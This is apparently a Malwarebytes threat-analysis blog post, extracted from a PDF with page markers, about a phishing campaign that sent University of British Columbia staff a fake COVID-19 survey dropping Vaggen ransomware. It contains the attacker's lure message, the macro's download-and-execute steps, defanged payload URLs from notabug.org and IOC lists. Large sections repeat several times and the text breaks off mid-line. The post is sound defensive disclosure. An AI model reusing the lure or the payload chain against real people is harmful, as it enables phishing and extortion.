post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 126 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 127 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 128 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 129 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 130 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 131 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 132 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 133 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 134 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 135 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 136 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 137 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 138 of 3467\n\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 139 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 140 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 141 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 142 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 143 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 144 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 145 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 146 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 147 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 148 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 149 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 150 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 151 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 152 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 153 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 154 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 155 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 156 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 157 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 158 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 159 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 160 of 